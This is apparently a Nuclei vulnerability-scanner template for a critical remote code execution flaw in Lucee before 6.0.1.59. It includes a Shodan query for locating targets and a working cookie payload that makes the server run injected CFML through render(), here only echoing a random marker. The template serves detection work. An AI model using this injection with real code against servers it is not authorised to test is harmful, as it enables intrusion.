id: lucee-rce
info:
name: Lucee < 6.0.1.59 - Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
reference:
- https://blog.projectdiscovery.io/hello-lucee-let-us-hack-apple-again
metadata:
verified: true
max-request: 1
shodan-query: http.title:"Lucee"
tags: lucee,rce,oast,vuln
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Cookie: CF_CLIENT_=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>'); CF_CLIENT_LUCEE=render('<cfscript>writeoutput(ToBinary("{{base64('{{randstr}}')}}"))</cfscript>');
matchers:
- type: dsl
dsl:
- contains(body, "{{randstr}}")
- contains(header, "cfid")
- contains(header, "cftoken")
condition: and
# digest: 4a0a0047304502207e90a0ac7adaa07a1d713c8fc72bedd1b5b60b0cfd381332ff2b3d42e8238aba022100a7e85eb9bbdad59c2b3cded6b37528ccb897404725cbf6539eb953a9fc035294:922c64590222798bb761d5b6d8e72950